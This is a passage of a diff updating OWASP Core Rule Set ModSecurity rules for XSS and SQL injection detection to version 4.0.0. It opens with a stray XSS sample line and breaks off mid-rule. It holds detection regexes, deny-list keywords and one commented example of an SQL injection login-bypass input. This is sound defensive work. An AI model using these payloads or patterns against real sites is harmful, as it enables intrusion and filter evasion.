Reflect.apply.call`${navigation.navigate}${navigation}${[name]}` +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx ((?:\[[^\]]*\][^.]*\.)|Reflect[^.]*\.).*(?:map|sort|apply)[^.]*\..*call[^`]*`.*`" \ + "id:941400,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,t:compressWhitespace,\ + msg:'XSS JavaScript function without parentheses',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'attack-xss',\ + tag:'xss-perf-disable',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:941013,phase:1,pass,nolog,skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:941014,phase:2,pass,nolog,skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:941013,phase:1,pass,nolog,skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:941014,phase:2,pass,nolog,skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" # -# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) +# -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) # # # This is a stricter sibling of rule 941100. # -SecRule REQUEST_HEADERS:Referer "@detectXSS" \ +SecRule REQUEST_FILENAME|REQUEST_HEADERS:Referer "@detectXSS" \ "id:941101,\ - phase:2,\ + phase:1,\ block,\ capture,\ t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ @@ -664,21 +781,55 @@ SecRule REQUEST_HEADERS:Referer "@detectXSS" \ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-xss',\ + tag:'xss-perf-disable',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ tag:'paranoia-level/2',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + +# +# -=[ XSS Filters - Category 2 ]=- +# XSS vectors making use of event handlers like onerror, onload etc, e.g., +# +# We are not listing all the known event handlers like rule 941160, but we +# limit the alerts to keywords of 3-25 characters after the prefix ("on"). +# +# The shortest known event is "onget". The longest known event is "onmozorientationchange" +# with 23 chars after the prefix. 25 chars adds a little bit of safety. +# +# This rule has been moved to PL2 since it has a tendency to trigger on random input. +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?i)[\s\"'`;/0-9=\x0B\x09\x0C\x3B\x2C\x28\x3B]on[a-zA-Z]{3,25}[\s\x0B\x09\x0C\x3B\x2C\x28\x3B]*?=[^=]" \ + "id:941120,\ + phase:2,\ + block,\ + capture,\ + t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ + msg:'XSS Filter - Category 2: Event Handler Vector',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-xss',\ + tag:'xss-perf-disable',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" # # -=[ XSS Filters - Category 5 ]=- # HTML attributes - src, style and href # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b(?:s(?:tyle|rc)|href)\b[\s\S]*?=" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?i)\b(?:s(?:tyle|rc)|href)\b[\s\S]*?=" \ "id:941150,\ phase:2,\ block,\ @@ -690,16 +841,48 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-xss',\ + tag:'xss-perf-disable',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ tag:'paranoia-level/2',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + + +# +# [Deny List Keywords from Node-Validator] +# https://github.com/validatorjs/validator.js/ +# This rule is a stricter sibling of 941180 (PL1) +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@contains -->" \ + "id:941181,\ + phase:2,\ + block,\ + capture,\ + t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:lowercase,t:removeNulls,\ + msg:'Node-Validator Deny List Keywords',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-xss',\ + tag:'xss-perf-disable',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + +# +# -=[ XSS Filters from IE ]=- + # Detect tags that are the most common direct HTML injection points. # # ~])" \ +# Regular expression generated from regex-assembly/942230.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 942230 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)[\s\v\(-\)]case[\s\v]+when.*?then|\)[\s\v]*?like[\s\v]*?\(|select.*?having[\s\v]*?[^\s\v]+[\s\v]*?[^\s\v0-9A-Z_a-z]|if[\s\v]?\([0-9A-Z_a-z]+[\s\v]*?[<->~]" \ "id:942230,\ phase:2,\ block,\ @@ -219,20 +268,17 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -# Regexp generated from util/regexp-assemble/regexp-942240.data using Regexp::Assemble. -# To rebuild the regexp: -# cd util/regexp-assemble -# ./regexp-assemble.pl regexp-942240.data -# Note that after assemble an outer bracket with an ignore case flag is added -# to the Regexp::Assemble output: -# (?i:ASSEMBLE_OUTPUT) +# Regular expression generated from regex-assembly/942240.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 942240 # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:(?:[\"'`](?:;*?\s*?waitfor\s+(?:delay|time)\s+[\"'`]|;.*?:\s*?goto)|alter\s*?\w+.*?cha(?:racte)?r\s+set\s+\w+))" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)alter[\s\v]*?[0-9A-Z_a-z]+.*?char(?:acter)?[\s\v]+set[\s\v]+[0-9A-Z_a-z]+|[\"'`](?:;*?[\s\v]*?waitfor[\s\v]+(?:time|delay)[\s\v]+[\"'`]|;.*?:[\s\v]*?goto)" \ "id:942240,\ phase:2,\ block,\ @@ -248,10 +294,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:merge.*?using\s*?\(|execute\s*?immediate\s*?[\"'`]|match\s*?[\w(),+-]+\s*?against\s*?\()" \ "id:942250,\ @@ -269,10 +315,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)union.*?select.*?from" \ "id:942270,\ @@ -290,20 +336,17 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -# Regexp generated from util/regexp-assemble/regexp-942280.data using Regexp::Assemble. -# To rebuild the regexp: -# cd util/regexp-assemble -# ./regexp-assemble.pl regexp-942280.data -# Note that after assemble an outer bracket with an ignore case flag is added -# to the Regexp::Assemble output: -# (?i:ASSEMBLE_OUTPUT) +# Regular expression generated from regex-assembly/942280.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 942280 # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:(?:;\s*?shutdown\s*?(?:[#;]|\/\*|--|\{)|waitfor\s*?delay\s?[\"'`]+\s?\d|select\s*?pg_sleep))" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)select[\s\v]*?pg_sleep|waitfor[\s\v]*?delay[\s\v]?[\"'`]+[\s\v]?[0-9]|;[\s\v]*?shutdown[\s\v]*?(?:[#;\{]|/\*|--)" \ "id:942280,\ phase:2,\ block,\ @@ -319,12 +362,17 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:(?:\[\$(?:ne|eq|lte?|gte?|n?in|mod|all|size|exists|type|slice|x?or|div|like|between|and)\]))" \ +# Regular expression generated from regex-assembly/942290.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 942290 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\[?\$(?:n(?:e|in?|o[rt])|e(?:q|xists|lemMatch)|l(?:te?|ike)|mod|a(?:ll|nd)|(?:s(?:iz|lic)|wher)e|t(?:ype|ext)|x?or|div|between|regex|jsonSchema)\]?" \ "id:942290,\ phase:2,\ block,\ @@ -340,20 +388,20 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -# Regexp generated from util/regexp-assemble/regexp-942320.data using Regexp::Assemble. -# To rebuild the regexp: -# cd util/regexp-assemble -# ./regexp-assemble.pl regexp-942320.data -# Note that after assemble an outer bracket with an ignore case flag is added -# to the Regexp::Assemble output: -# (?i:ASSEMBLE_OUTPUT) +# This rule has a stricter sibling (942321) that checks for MySQL and PostgreSQL procedures / functions in +# request headers referer and user-agent. +# +# Regular expression generated from regex-assembly/942320.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 942320 # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:(?:create\s+(?:procedure|function)\s*?\w+\s*?\(\s*?\)\s*?-|;\s*?(?:declare|open)\s+[\w-]+|procedure\s+analyse\s*?\(|declare[^\w]+[@#]\s*?\w+|exec\s*?\(\s*?\@))" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)create[\s\v]+(?:function|procedure)[\s\v]*?[0-9A-Z_a-z]+[\s\v]*?\([\s\v]*?\)[\s\v]*?-|d(?:eclare[^0-9A-Z_a-z]+[#@][\s\v]*?[0-9A-Z_a-z]+|iv[\s\v]*?\([\+\-]*[\s\v\.0-9]+,[\+\-]*[\s\v\.0-9]+\))|exec[\s\v]*?\([\s\v]*?@|(?:lo_(?:impor|ge)t|procedure[\s\v]+analyse)[\s\v]*?\(|;[\s\v]*?(?:declare|open)[\s\v]+[\-0-9A-Z_a-z]+|::(?:b(?:igint|ool)|double[\s\v]+precision|int(?:eger)?|numeric|oid|real|(?:tex|smallin)t)" \ "id:942320,\ phase:2,\ block,\ @@ -369,20 +417,17 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -# Regexp generated from util/regexp-assemble/regexp-942350.data using Regexp::Assemble. -# To rebuild the regexp: -# cd util/regexp-assemble -# ./regexp-assemble.pl regexp-942350.data -# Note that after assemble an outer bracket with an ignore case flag is added -# to the Regexp::Assemble output: -# (?i:ASSEMBLE_OUTPUT) +# Regular expression generated from regex-assembly/942350.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 942350 # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:(?:;\s*?(?:(?:(?:trunc|cre|upd)at|renam)e|(?:inser|selec)t|de(?:lete|sc)|alter|load)\b\s*?[\[(]?\w{2,}|create\s+function\s+.+\s+returns))" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)create[\s\v]+function[\s\v].+[\s\v]returns|;[\s\v]*?(?:alter|(?:(?:cre|trunc|upd)at|renam)e|d(?:e(?:lete|sc)|rop)|(?:inser|selec)t|load)\b[\s\v]*?[\(\[]?[0-9A-Z_a-z]{2,}" \ "id:942350,\ phase:2,\ block,\ @@ -398,31 +443,30 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -# This rule has a stricter sibling: 942361. +# This rule has two stricter sibling: 942361 and 942362. # The keywords 'alter' and 'union' led to false positives. # Therefore they have been moved to PL2 and the keywords have been extended on PL1. +# The original version also had loose word boundaries and context checksum cause further false positives. +# Because fixing those introduced bypass, the original variant was moved to PL2 as 942362. # # Sources for SQL ALTER statements: # MySQL: https://dev.mysql.com/doc/refman/5.7/en/sql-syntax-data-definition.html -# Oracle/PLSQL: https://docs.oracle.com/apps/search/search.jsp?q=alter&size=60&category=database +# Oracle/PLSQL: https://docs.oracle.com/search/?q=alter&size=60&category=database # PostgreQSL: https://www.postgresql.org/search/?u=%2Fdocs&q=alter -# MSSQL: https://docs.microsoft.com/en-us/sql/t-sql/statements/statements -# DB2: https://www.ibm.com/support/knowledgecenter/en/search/alter?scope=SSEPGG_9.5.0 -# -# Regexp generated from util/regexp-assemble/regexp-942360.data using Regexp::Assemble. -# To rebuild the regexp: -# cd util/regexp-assemble -# ./regexp-assemble.pl regexp-942360.data -# Note that after assemble an outer bracket with an ignore case flag is added -# to the Regexp::Assemble output: -# (?i:ASSEMBLE_OUTPUT) -# -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:(?:^[\W\d]+\s*?(?:(?:alter\s*(?:a(?:(?:pplication\s*rol|ggregat)e|s(?:ymmetric\s*ke|sembl)y|u(?:thorization|dit)|vailability\s*group)|c(?:r(?:yptographic\s*provider|edential)|o(?:l(?:latio|um)|nversio)n|ertificate|luster)|s(?:e(?:rv(?:ice|er)|curity|quence|ssion|arch)|y(?:mmetric\s*key|nonym)|togroup|chema)|m(?:a(?:s(?:ter\s*key|k)|terialized)|e(?:ssage\s*type|thod)|odule)|l(?:o(?:g(?:file\s*group|in)|ckdown)|a(?:ngua|r)ge|ibrary)|t(?:(?:abl(?:espac)?|yp)e|r(?:igger|usted)|hreshold|ext)|p(?:a(?:rtition|ckage)|ro(?:cedur|fil)e|ermission)|d(?:i(?:mension|skgroup)|atabase|efault|omain)|r(?:o(?:l(?:lback|e)|ute)|e(?:sourc|mot)e)|f(?:u(?:lltext|nction)|lashback|oreign)|e(?:xte(?:nsion|rnal)|(?:ndpoi|ve)nt)|in(?:dex(?:type)?|memory|stance)|b(?:roker\s*priority|ufferpool)|x(?:ml\s*schema|srobject)|w(?:ork(?:load)?|rapper)|hi(?:erarchy|stogram)|o(?:perator|utline)|(?:nicknam|queu)e|us(?:age|er)|group|java|view)|u(?:nion\s*(?:(?:distin|sele)ct|all)|pdate)|(?:truncat|renam)e|(?:inser|selec)t|de(?:lete|sc)|load)\b|create\s+\w+)|(?:(?:(?:trunc|cre|upd)at|renam)e|(?:inser|selec)t|de(?:lete|sc)|alter|load)\s+(?:group_concat|load_file|char)\s?\(?|[\d\W]\s+as\b\s*[\"'`\w]+\s*\bfrom|[\s(]load_file\s*?\(|[\"'`]\s+regexp\W|end\s*?\);))" \ +# MSSQL: https://learn.microsoft.com/en-us/sql/t-sql/statements/statements?view=sql-server-ver16 +# DB2: https://www.ibm.com/docs/en/search/alter?scope=SSEPGG_9.5.0 +# +# Regular expression generated from regex-assembly/942360.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 942360 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b(?:(?:alter|(?:(?:cre|trunc|upd)at|renam)e|de(?:lete|sc)|(?:inser|selec)t|load)[\s\v]+(?:char|group_concat|load_file)\b[\s\v]*\(?|end[\s\v]*?\);)|[\s\v\(]load_file[\s\v]*?\(|[\"'`][\s\v]+regexp[^0-9A-Z_a-z]|[\"'0-9A-Z_-z][\s\v]+as\b[\s\v]*[\"'0-9A-Z_-z]+[\s\v]*\bfrom|^[^A-Z_a-z]+[\s\v]*?(?:(?:(?:(?:cre|trunc)at|renam)e|d(?:e(?:lete|sc)|rop)|(?:inser|selec)t|load)[\s\v]+[0-9A-Z_a-z]+|u(?:pdate[\s\v]+[0-9A-Z_a-z]+|nion[\s\v]*(?:all|(?:sele|distin)ct)\b)|alter[\s\v]*(?:a(?:(?:ggregat|pplication[\s\v]*rol)e|s(?:sembl|ymmetric[\s\v]*ke)y|u(?:dit|thorization)|vailability[\s\v]*group)|b(?:roker[\s\v]*priority|ufferpool)|c(?:ertificate|luster|o(?:l(?:latio|um)|nversio)n|r(?:edential|yptographic[\s\v]*provider))|d(?:atabase|efault|i(?:mension|skgroup)|omain)|e(?:(?:ndpoi|ve)nt|xte(?:nsion|rnal))|f(?:lashback|oreign|u(?:lltext|nction))|hi(?:erarchy|stogram)|group|in(?:dex(?:type)?|memory|stance)|java|l(?:a(?:ngua|r)ge|ibrary|o(?:ckdown|g(?:file[\s\v]*group|in)))|m(?:a(?:s(?:k|ter[\s\v]*key)|terialized)|e(?:ssage[\s\v]*type|thod)|odule)|(?:nicknam|queu)e|o(?:perator|utline)|p(?:a(?:ckage|rtition)|ermission|ro(?:cedur|fil)e)|r(?:e(?:mot|sourc)e|o(?:l(?:e|lback)|ute))|s(?:chema|e(?:arch|curity|rv(?:er|ice)|quence|ssion)|y(?:mmetric[\s\v]*key|nonym)|togroup)|t(?:able(?:space)?|ext|hreshold|r(?:igger|usted)|ype)|us(?:age|er)|view|w(?:ork(?:load)?|rapper)|x(?:ml[\s\v]*schema|srobject))\b)" \ "id:942360,\ phase:2,\ block,\ @@ -438,10 +482,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # -=[ Detect MySQL in-line comments ]=- @@ -458,7 +502,12 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME # The minimal string that triggers this regexp is: /*!*/ or /*+*/. # The rule 942500 is related to 942440 which catches both /*! and */ independently. # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:/\*[!+](?:[\w\s=_\-()]+)?\*/)" \ +# Regular expression generated from regex-assembly/942500.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 942500 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)/\*[\s\v]*?[!\+](?:[\s\v\(-\)\-0-9=A-Z_a-z]+)?\*/" \ "id:942500,\ phase:2,\ block,\ @@ -474,35 +523,92 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ + multiMatch,\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:942013,phase:1,pass,nolog,skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:942014,phase:2,pass,nolog,skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" +# This rule catches an authentication bypass via SQL injection that abuses semi-colons to end the SQL query early. +# Any characters after the semi-colon are ignored by some DBMSes (e.g. SQLite). +# +# An example of this would be: +# email=admin%40juice-sh.op';&password=foo +# +# The server then turns this into: +# SELECT * FROM users WHERE email='admin@juice-sh.op';' AND password='foo' # -# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) +# Regular expression generated from regex-assembly/942540.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 942540 # +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx ^(?:[^']*'|[^\"]*\"|[^`]*`)[\s\v]*;" \ + "id:942540,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,t:replaceComments,\ + msg:'SQL Authentication bypass (split query)',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-sqli',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/66',\ + tag:'PCI/6.5.2',\ + tag:'paranoia-level/1',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" +# This rule catches on Scientific Notation bypass payloads in MySQL +# Reference: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md#scientific-notation # -# -=[ String Termination/Statement Ending Injection Testing ]=- +# Regular expression generated from regex-assembly/942560.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 942560 # -# Identifies common initial SQLi probing requests where attackers insert/append -# quote characters to the existing normal payload to see how the app/db responds. +SecRule 